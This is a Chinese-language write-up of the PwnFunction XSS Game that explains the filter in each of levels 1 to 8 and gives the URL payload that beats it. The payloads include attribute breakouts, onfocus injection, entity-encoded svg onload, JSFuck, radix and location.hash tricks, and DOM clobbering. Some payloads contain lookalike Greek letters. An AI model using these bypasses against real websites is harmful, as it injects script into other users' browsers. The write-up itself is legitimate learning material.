xss GAME (xss漏洞攻击1-8)

目录

xss网页链接

第一关

第二关

第三关

​编辑第四关

​编辑第五关

​编辑第六关

第七关

[第一种 Function构建函数](#第一种 Function构建函数)

[第二种 tostring parseInt](#第二种 tostring parseInt)

[第三种 silce()](#第三种 silce())

[​编辑第八关(安全过滤框架 dom破坏)](#编辑第八关(安全过滤框架 dom破坏))


xss网页链接

XSS Game - Learning XSS Made Simple! | Created by PwnFunction

第一关

分析源码可知,没有任何过滤,那直接动手操作即可

而且有需求,不能有用户参与,而且必须弹窗1337

第二关

分析:innerText=ma 这个代码 将会把你输入的都将转换为文本

那么思考一下 绕过双引号 即可

?jeff=a";alert(1337);"

第三关

过滤了一些字符 用聚焦解决

?wey=1"%20οnfοcus="alert(1337)"%20autofocus="ture

第四关

?ricardo=javascript:alert(1337)

有setTIMEout 输入进去等待几秒即可

第五关

js不支持编码符号 但是支持字符串

所以location 可以转换字符串

url编码 为实体编码 然后执行

?markassbrownlee=<svg%20οnlοad=alert%26%2340%3B1337%26%2341%3B>

第六关

过滤了英文字母 所以直接没办法用英文

jsfuck 这个可以让字母变成 ![]

eval可以直接执行命令

JSFuck - Write any JavaScript with 6 Characters: []()!+

第七关

限制 0-50 所以上一关无法使用

有三种解法

第一种 Function构建函数

构建一个ALERT(1337) source 是获取函数原码 toLowerCase() 获取小写

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

第二种 tostring parseInt

首先得科普一下parseInt

parseInt,是Javascript内置函数,原型为parseInt ( String s , [ int radix ] ),用于解析一个字符串,并返回一个整数。

tostring 将数字转回为字符串

那么问题来了为啥要 tostring(30) 而不是29 或者 28 呢

alert 这个 t 必须到30进制才可以转换的到 例子:16进制最大是F

?mafia=eval(9875141..toString(31))(1337)

第三种 silce()

锚点

location.hash 获取url#后面的值 我们通过切片将alert切出来

?mafia=eval(location.hash.slice(1))#alert(1337)

第八关(安全过滤框架 dom破坏)

DOM破坏是一种将HTML注入页面以操纵DOM并最终改变页面上JavaScript行为的技术。

就是修改他原来的参数,进行覆盖,最后误以为是正确的

分析源码可知 ok 我们可以覆盖
我们可以得到两种标签对象: HTMLAreaElement (<area>) & HTMLAnchorElement (<a>) ,这两个
标签对象我们都可以利⽤ href 属性来进⾏字符串转换。
我这里使用a标签

?boomer=<a%20id=ok%20href=tel:alert(1337)>

?boomer=<a%20id=ok%20href=cid:alert(1337)>

这里用到了白名单 tel cid 因为javascript 不可以使用

相关推荐
m0_7482412330 分钟前
ElasticPDF-新国产 PDF 编辑器开发框架(基于 pdf.js Web PDF批注开发,实现高亮多边形橡皮擦历史记录保存注释文字)
前端·pdf·编辑器
huapiaoy43 分钟前
JavaSE---String(含一些源码)
java·linux·前端
rkmhr_sef44 分钟前
frp内网穿透云服务器。云服务器映射多个家庭局域网内网端口。家庭Windows主机内网运行多个web程序
服务器·前端·windows
带多刺的玫瑰44 分钟前
Leecode刷题C语言之考场就座
c语言·前端·javascript
麦子爱种地1 小时前
前端学习DAY26(华为平板页面)
服务器·前端·javascript
m0_748248021 小时前
HTML5前端实现毛玻璃效果的可拖拽登录框
前端·html·html5
Loong_DQX1 小时前
【前端js】 indexedDB Nosql的使用方法
前端·javascript·nosql·indexeddb
╰つ゛木槿1 小时前
Spring Boot与Django对比:哪个更适合做为Web服务器框架?
前端·spring boot·django
爱笑的眼睛111 小时前
浅谈 前端验证码那些事
前端·程序人生
Kika写代码2 小时前
【微信小程序】2|轮播图 | 我的咖啡店-综合实训
前端·微信小程序·小程序